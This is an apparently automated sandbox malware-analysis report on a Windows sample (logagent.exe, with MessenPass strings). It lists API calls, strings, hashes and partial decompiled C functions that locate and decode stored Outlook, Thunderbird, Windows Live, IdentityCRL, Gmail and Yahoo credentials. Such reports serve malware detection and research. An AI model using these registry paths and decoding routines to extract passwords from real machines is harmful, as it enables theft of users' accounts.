                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ClassCreateRegisterWindow
                                          • String ID: MessenPass
                                          • API String ID: 3469048531-1347981195
                                          • Opcode ID: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
                                          • Instruction ID: df568ce2afab08691587747be1d5034a2dd7dfffecd18501b630fd2d0d2d029c
                                          • Opcode Fuzzy Hash: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
                                          • Instruction Fuzzy Hash: 0701E8B5D00608AFDB11CF9ACD49ADFFFF8EB89704F10802BE541A6250D7B46640CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408A29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadMenuA.USER32(00000000), ref: 00408A31
                                          • sprintf.MSVCRT ref: 00408A54
                                            • Part of subcall function 004088D4: GetMenuItemCount.USER32(?), ref: 004088EA
                                            • Part of subcall function 004088D4: memset.MSVCRT ref: 0040890E
                                            • Part of subcall function 004088D4: GetMenuItemInfoA.USER32(?), ref: 00408944
                                            • Part of subcall function 004088D4: memset.MSVCRT ref: 00408971
                                            • Part of subcall function 004088D4: strchr.MSVCRT ref: 0040897D
                                            • Part of subcall function 004088D4: _mbscat.MSVCRT ref: 004089D8
                                            • Part of subcall function 004088D4: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 004089F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                          • String ID: menu_%d
                                          • API String ID: 1129539653-2417748251
                                          • Opcode ID: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
                                          • Instruction ID: 6e6fd20b795a8bab19114a67d1783e5b01d02cb8a2ade4a69635827cbafc1364
                                          • Opcode Fuzzy Hash: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
                                          • Instruction Fuzzy Hash: EBD0C232A0030076E61033276C0EFCB29195BD2B19F54807FF400710C5DEBD018487AC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406BC3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00406BC3(intOrPtr _a4) {

				if( *0x41e458 == 0) {
					 *0x41e560 = GetWindowsDirectoryA(0x41e458, 0x104);
				}
				0x413d0c(_a4, 0x41e458);
				return  *0x41e560;
			}



                                          0x00406bd0
                                          0x00406bde
                                          0x00406bde
                                          0x00406be8
                                          0x00406bf5

                                          APIs
                                          • GetWindowsDirectoryA.KERNEL32(0041E458,00000104,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BD8
                                          • _mbscpy.MSVCRT ref: 00406BE8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: DirectoryWindows_mbscpy
                                          • String ID: XA
                                          • API String ID: 257536871-3740220071
                                          • Opcode ID: 861364e7de9ee2ae089174bca0caadeda4635289f72fc20d00e4fde06078ff85
                                          • Instruction ID: 8f816420b632b6a764ea2497921bafe0203b6dc712d69cfd7b43a4c86b5ca7f0
                                          • Opcode Fuzzy Hash: 861364e7de9ee2ae089174bca0caadeda4635289f72fc20d00e4fde06078ff85
                                          • Instruction Fuzzy Hash: 47D05E7540C260BFF7109B12FC45AC63FE4EF49334F10803AF804961A0EB746981869C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409141, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00409141(char* __esi) {
				char* _t2;
				char* _t5;

				_t5 = __esi;
				E004069E8(__esi);
				_t2 = strrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 = 0;
				}
				0x413cf4(_t5, "_lng.ini");
				return _t2;
			}





                                          0x00409141
                                          0x00409142
                                          0x0040914a
                                          0x00409154
                                          0x00409156
                                          0x00409156
                                          0x0040915f
                                          0x00409166

                                          APIs
                                            • Part of subcall function 004069E8: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409147,00000000,0040905A,?,00000000,00000104), ref: 004069F3
                                          • strrchr.MSVCRT ref: 0040914A
                                          • _mbscat.MSVCRT ref: 0040915F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileModuleName_mbscatstrrchr
                                          • String ID: _lng.ini
                                          • API String ID: 3334749609-1948609170
                                          • Opcode ID: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
                                          • Instruction ID: a8986b5d0fc5065fa4420194992ab4643f38d39362f1d3b193e5f677e6d35072
                                          • Opcode Fuzzy Hash: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
                                          • Instruction Fuzzy Hash: D7C0127124565054E11231222D03BCB05480F12705F29006FFC01781C3EE5D4A9180AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407E33, Relevance: 5.1, APIs: 4, Instructions: 108stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E00407E33(intOrPtr* _a4, intOrPtr _a8, char* _a12) {
				int _v12;
				int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				signed int* _v40;
				char _v44;
				void _v304;
				char _v560;
				void _v2607;
				char _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				signed int _t40;
				signed int _t44;
				signed int* _t64;
				char _t72;
				signed int _t77;
				char* _t78;
				void* _t81;
				void* _t82;
				int _t84;
				char* _t86;
				void* _t88;
				signed int _t93;

				_t39 = strlen(_a12);
				_t77 = _t39;
				_t40 = _t39 & 0x80000001;
				if(_t40 < 0) {
					_t40 = (_t40 - 0x00000001 | 0xfffffffe) + 1;
					_t93 = _t40;
				}
				if(_t93 != 0 || _t77 <= 0x20) {
					return _t40;
				} else {
					_t82 = 0;
					_v2608 = 0;
					memset( &_v2607, 0, 0x7ff);
					_t64 = _a4 + 4;
					_t44 =  *_t64 | 0x00000001;
					_v12 = 0;
					if(_t77 <= 4) {
						L8:
						_v28 = _t82;
						_v20 = _t82;
						_v24 = _t82;
						if(E00404C9D( &_v28, 0) != 0) {
							_v36 = _v12;
							_v32 =  &_v2608;
							_v44 = 0x10;
							_v40 = _t64;
							if(E00404CF5( &_v28,  &_v36,  &_v44,  &_v16) != 0) {
								_t84 = _v16;
								if(_t84 > 0xff) {
									_t84 = 0xff;
								}
								_v560 = 0;
								_v304 = 0;
								memcpy( &_v304, _v12, _t84);
								_t78 =  &_v560;
								 *((char*)(_t88 + _t84 - 0x12c)) = 0;
								E00406958(0xff, _t78, _a8);
								 *((intOrPtr*)( *_a4))(_t78);
								LocalFree(_v12);
							}
						}
						return E00404CE0( &_v28);
					}
					_t86 =  &(_a12[5]);
					_t81 = (_t77 + 0xfffffffb >> 1) + 1;
					do {
						_t72 = ( *((intOrPtr*)(_t86 - 1)) - 0x00000001 << 0x00000004 |  *_t86 - 0x00000021) - _t44;
						_t44 = _t44 * 0x10ff5;
						_t86 =  &(_t86[2]);
						_v12 = _v12 + 1;
						_t81 = _t81 - 1;
						 *((char*)(_t88 + _v12 - 0xa2c)) = _t72;
					} while (_t81 != 0);
					_t82 = 0;
					goto L8;
				}
			}
































                                          0x00407e42
                                          0x00407e47
                                          0x00407e49
                                          0x00407e4f
                                          0x00407e55
                                          0x00407e55
                                          0x00407e55
                                          0x00407e56
                                          0x00407f7b
                                          0x00407e65
                                          0x00407e6a
                                          0x00407e74
                                          0x00407e7b
                                          0x00407e83
                                          0x00407e8b
                                          0x00407e91
                                          0x00407e94
                                          0x00407ecd
                                          0x00407ed0
                                          0x00407ed3
                                          0x00407ed6
                                          0x00407ee0
                                          0x00407ee9
                                          0x00407ef2
                                          0x00407f04
                                          0x00407f0b
                                          0x00407f15
                                          0x00407f17
                                          0x00407f21
                                          0x00407f23
                                          0x00407f23
                                          0x00407f30
                                          0x00407f37
                                          0x00407f3e
                                          0x00407f46
                                          0x00407f4c
                                          0x00407f54
                                          0x00407f64
                                          0x00407f69
                                          0x00407f69
                                          0x00407f15
                                          0x00000000
                                          0x00407f72
                                          0x00407e9e
                                          0x00407ea1
                                          0x00407ea2
                                          0x00407eb4
                                          0x00407eb6
                                          0x00407ebd
                                          0x00407ebe
                                          0x00407ec1
                                          0x00407ec2
                                          0x00407ec2
                                          0x00407ecb
                                          0x00000000
                                          0x00407ecb

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FreeLocalmemcpymemsetstrlen
                                          • String ID:
                                          • API String ID: 3110682361-0
                                          • Opcode ID: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
                                          • Instruction ID: 94145ba3e6d447937b4e48053a9a2b44a3b831c7855691199b8e714b6b5b9eaf
                                          • Opcode Fuzzy Hash: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
                                          • Instruction Fuzzy Hash: 9941C372D041199BCF109FA9C841BDEBFB8EF49314F1041B6E955B7281C238AA85CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004092CC, Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: 1bad524f509e8432f6dffaaf9df71c7c9054cf9a40cbc24d5c758d582a256a45
                                          • Instruction ID: 542bc7e3926c6d60784d6f8799ebb0262de6c8f0aff60c73b96b1684488c9edf
                                          • Opcode Fuzzy Hash: 1bad524f509e8432f6dffaaf9df71c7c9054cf9a40cbc24d5c758d582a256a45
                                          • Instruction Fuzzy Hash: 9621B3B0A053008FDB558F6A9845955FBF8FF94311B2AC9AFD508DB2B2D7B8C9409F14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: logagent.exe PID: 5628 Parent PID: 3228 logagent.exeCOMMON

                                          Executed Functions

                                          Function 00407C87, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
                                          • FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
                                          • strlen.MSVCRT ref: 00407CEB
                                          • strlen.MSVCRT ref: 00407CF3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileFindstrlen$FirstNext
                                          • String ID: .8D
                                          • API String ID: 379999529-2881260426
                                          • Opcode ID: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                          • Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
                                          • Opcode Fuzzy Hash: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                          • Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401E60, Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00401E82
                                          • strlen.MSVCRT ref: 00401E9B
                                          • strlen.MSVCRT ref: 00401EA9
                                          • strlen.MSVCRT ref: 00401EEF
                                          • strlen.MSVCRT ref: 00401EFD
                                          • memset.MSVCRT ref: 00401FA8
                                          • atoi.MSVCRT ref: 00401FD7
                                          • memset.MSVCRT ref: 00401FFA
                                          • sprintf.MSVCRT ref: 00402027
                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                          • memset.MSVCRT ref: 0040207D
                                          • memset.MSVCRT ref: 00402092
                                          • strlen.MSVCRT ref: 00402098
                                          • strlen.MSVCRT ref: 004020A6
                                          • strlen.MSVCRT ref: 004020D9
                                          • strlen.MSVCRT ref: 004020E7
                                          • memset.MSVCRT ref: 0040200F
                                            • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                            • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                          • _mbscpy.MSVCRT ref: 0040216E
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402178
                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 00402193
                                            • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                          • API String ID: 1846531875-4223776976
                                          • Opcode ID: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                          • Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
                                          • Opcode Fuzzy Hash: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                          • Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040CC66, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                            • Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                            • Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                            • Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
                                          • DeleteObject.GDI32(?), ref: 0040CEC8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                          • API String ID: 745651260-375988210
                                          • Opcode ID: 0e7b97f45477183378a32522f6888ef2dfda47b1227b8069460a3777cd3d0e7e
                                          • Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
                                          • Opcode Fuzzy Hash: 0e7b97f45477183378a32522f6888ef2dfda47b1227b8069460a3777cd3d0e7e
                                          • Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408043, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004080A5
                                          • memset.MSVCRT ref: 004080B9
                                          • memset.MSVCRT ref: 004080D3
                                          • memset.MSVCRT ref: 004080E8
                                          • GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                          • GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                          • strlen.MSVCRT ref: 0040815B
                                          • strlen.MSVCRT ref: 0040816A
                                          • memcpy.MSVCRT ref: 0040817C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                          • String ID: 5$H$O$b$i$}$}
                                          • API String ID: 1832431107-3760989150
                                          • Opcode ID: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                          • Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
                                          • Opcode Fuzzy Hash: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                          • Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403C03, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
                                          • _mbscpy.MSVCRT ref: 00403E41
                                          Strings
                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
                                          • pstorec.dll, xrefs: 00403C1D
                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C87
                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F
                                          • PStoreCreateInstance, xrefs: 00403C31
                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C73
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                          • API String ID: 1197458902-317895162
                                          • Opcode ID: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                          • Instruction ID: 8c3092e028ed30b7bcb0bf0438431f6e947b4810b401e401bf51def59c6c6aaf
                                          • Opcode Fuzzy Hash: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                          • Instruction Fuzzy Hash: 5C51A571600615B6E714AF71CD86FEAB76CAF00709F20053FF904B61C2DBBDBA5486A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F478, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                          • memcpy.MSVCRT ref: 0040F55C
                                          • memcpy.MSVCRT ref: 0040F571
                                            • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                            • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
                                            • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                            • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                          • API String ID: 2768085393-888555734
                                          • Opcode ID: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                          • Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
                                          • Opcode Fuzzy Hash: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                          • Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044412E, Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                          • String ID:
                                          • API String ID: 3662548030-0
                                          • Opcode ID: 4b9c7533954e26831581d23f4790c468d578c52e19518a271cf5a88ab33fa073
                                          • Instruction ID: fc298a0057bb7b157c7d5bb9a283569fada43ed9a32b195ba4478b44b5386df1
                                          • Opcode Fuzzy Hash: 4b9c7533954e26831581d23f4790c468d578c52e19518a271cf5a88ab33fa073
                                          • Instruction Fuzzy Hash: 9E419F74D00714DFEB209FA4D8897AE7BB4BB85715F20016BF4519B2A2D7B88C82CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004437D7, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004437F8
                                            • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
                                            • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
                                            • Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351
                                            • Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
                                            • Part of subcall function 0041072B: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                            • Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7
                                          • memset.MSVCRT ref: 00443866
                                          • memset.MSVCRT ref: 00443881
                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
                                          • strlen.MSVCRT ref: 004438C8
                                          • _strcmpi.MSVCRT ref: 004438EE
                                          Strings
                                          • \Microsoft\Windows Mail, xrefs: 00443816
                                          • \Microsoft\Windows Live Mail, xrefs: 0044383D
                                          • Software\Microsoft\Windows Live Mail, xrefs: 00443897
                                          • Store Root, xrefs: 00443892
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                          • API String ID: 832325562-2578778931
                                          • Opcode ID: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                          • Instruction ID: 024f477f45f6e85a7703d2448ebd5bdc30730893e4efb81a5a52e1788c76f972
                                          • Opcode Fuzzy Hash: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                          • Instruction Fuzzy Hash: 723166B2508344AAF320FB99DC47FCB77DC9B88715F14441FF648D7182EA78964487AA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040EDD5, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040EEDC
                                          • memset.MSVCRT ref: 0040EEF4
                                            • Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669
                                          • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C
                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                          • memcpy.MSVCRT ref: 0040EFC7
                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                          • String ID:
                                          • API String ID: 2012582556-3916222277
                                          • Opcode ID: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                          • Instruction ID: 747b8e804c7bbb21ad1dd8da88f93546a58f2d2a8080c646c51fe7008e5948b4
                                          • Opcode Fuzzy Hash: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                          • Instruction Fuzzy Hash: 83811E618087CB9ECB21DBBC8C445DDBF745F17234F0843A9E5B47A2E2D3245A46C7AA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004037BC, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004037DD
                                          • memset.MSVCRT ref: 004037F1
                                            • Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
                                            • Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                          • strchr.MSVCRT ref: 00403860
                                          • _mbscpy.MSVCRT ref: 0040387D
                                          • strlen.MSVCRT ref: 00403889
                                          • sprintf.MSVCRT ref: 004038A9
                                          • _mbscpy.MSVCRT ref: 004038BF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                          • String ID: %s@yahoo.com
                                          • API String ID: 317221925-3288273942
